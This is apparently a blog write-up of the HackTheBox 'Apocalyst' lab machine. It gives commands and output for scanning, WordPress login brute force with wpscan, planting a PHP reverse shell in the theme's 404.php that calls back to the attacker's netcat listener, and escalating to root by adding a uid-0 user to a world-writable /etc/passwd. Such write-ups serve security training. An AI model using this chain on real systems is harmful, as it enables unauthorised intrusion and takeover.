hackthebox – apocalyst – Linux

Starting with masscan

# masscan -e tun0 -p1-65535 10.10.10.46 --rate=1000

Starting masscan 1.0.6 (http://bit.ly/14GZzcT) at 2019-06-27 16:38:49 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.10.10.46                                     
Discovered open port 22/tcp on 10.10.10.46  

Two ports are open, web and ssh

Browsing web, we see WordPress but site does not look good.

hackthebox – apocalyst

To view it correctly we need to put following in our /etc/hosts file

10.10.10.46 www.apocalyst.htb apocalyst.htb

Then browsing the site.

hackthebox

We can go to http://10.10.10.46/?author=1 to view the user in WordPress. This gives us user falaraki

We then use gobuster to find other pages but it keeps on giving 301 redirect which gives us following picture.

hackthebox

We use cewl tool to generate list of words from the main page.

# cewl -m 5 -w wordlist.txt http://10.10.10.46/

Used the output and again use gobuster.

# gobuster -u http://10.10.10.46 -w wordlist.txt -t 30  -f -l
/glorification/ (Status: 200) [Size: 157]
/given/ (Status: 200) [Size: 157]
/Rightiousness/ (Status: 200) [Size: 175]
/Psalms/ (Status: 200) [Size: 157]
/Sheol/ (Status: 200) [Size: 157]
/consigned/ (Status: 200) [Size: 157]

Here,
-f is to append / at the end of each word
-l to list the size

We find a folder with different size ie 175.

Going to the url http://apocalyst.htb/Rightiousness/ reveals same image.

hackthebox

But, this time if we view the source of the page, we see following:

<!doctype html>

<html lang="en">
<head>
  <meta charset="utf-8">

  <title>End of the world</title>
</head>

<body>
  <img src="image.jpg">
  <!-- needle -->
</body>
</html>

Notice <!-- needle -->

We use tool called steghide to see if there is any hidden data.

# steghide --extract -sf image.jpg 
Enter passphrase: 
wrote extracted data to "list.txt".

Note: There is no password, just hit ENTER in keyboard for password.

We got file called list.txt. Now, using it to find the WordPress login for user falaraki user

# wpscan --url http://10.10.10.46 --wordlist /root/htb/apocalyst/list.txt --username falaraki

We get the password to be Transclisiation

We can login to dashboard.

hackthebox

Go to Appearance –> Editor and replace 404.php with the reverse shell found in /usr/share/webshells/php/php-reverse-shell.php , edit following

$ip = '10.10.14.21';  // CHANGE THIS
$port = 5353;       // CHANGE THIS

and listen for reverse shell

# nc -lvnp 5353

Then, go to http://apocalyst.htb/wp-content/themes/twentyseventeen/404.php

You will get the shell

# nc -lvnp 5353
listening on [any] 5353 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.46] 35008
Linux apocalyst 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 06:44:49 up 5 days,  5:20,  0 users,  load average: 0.00, 0.08, 0.07
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data

Go to the user home directory.

$ cd /home/falaraki
$ ls -thal
total 44K
-rw------- 1 falaraki falaraki  516 Jul 27  2017 .bash_history
drwxr-xr-x 4 falaraki falaraki 4.0K Jul 27  2017 .
-rw-r--r-- 1 root     root     1.0K Jul 27  2017 .wp-config.php.swp
-rw-rw-r-- 1 falaraki falaraki  109 Jul 26  2017 .secret
-rw-rw-r-- 1 falaraki falaraki   33 Jul 26  2017 user.txt
drwxrwxr-x 2 falaraki falaraki 4.0K Jul 26  2017 .nano
-rw-r--r-- 1 falaraki falaraki    0 Jul 26  2017 .sudo_as_admin_successful
drwx------ 2 falaraki falaraki 4.0K Jul 26  2017 .cache
-rw-r--r-- 1 falaraki falaraki 3.7K Jul 26  2017 .bashrc
-rw-r--r-- 1 falaraki falaraki  655 Jul 26  2017 .profile
-rw-r--r-- 1 falaraki falaraki  220 Jul 26  2017 .bash_logout
drwxr-xr-x 3 root     root     4.0K Jul 26  2017 ..
$ cat .secret
S2VlcCBmb3JnZXR0aW5nIHBhc3N3b3JkIHNvIHRoaXMgd2lsbCBrZWVwIGl0IHNhZmUhDQpZMHVBSU50RzM3VGlOZ1RIIXNVemVyc1A0c3M=

# echo S2VlcCBmb3JnZXR0aW5nIHBhc3N3b3JkIHNvIHRoaXMgd2lsbCBrZWVwIGl0IHNhZmUhDQpZMHVBSU50RzM3VGlOZ1RIIXNVemVyc1A0c3M= | base64 -d
Keep forgetting password so this will keep it safe!
Y0uAINtG37TiNgTH!sUzersP4ss

We got user password. We can login with this password from ssh.

# ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

120 packages can be updated.
61 updates are security updates.


Last login: Thu Jul 27 12:09:11 2017 from 10.0.2.15
[email protected]:~$ 

Using Linuxenum we see that /etc/passwd is world writable

-rw-rw-rw- 1 root root 1.6K Jul 26  2017 /etc/passwd

We can add another user as root using openssl tool.

$ openssl passwd -1 -salt hacker hacker 
$1$hacker$TzyKlv0/R/c28R.GAeLw.1

Here, the user we are adding is hacker and the password is also hacker

Add above output as following and append to /etc/passwd file.

hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:root:/root:/bin/bash

Then

$ su hacker
Password:  hacker
[email protected]:/home/falaraki#

Leave a Reply

Your email address will not be published. Required fields are marked *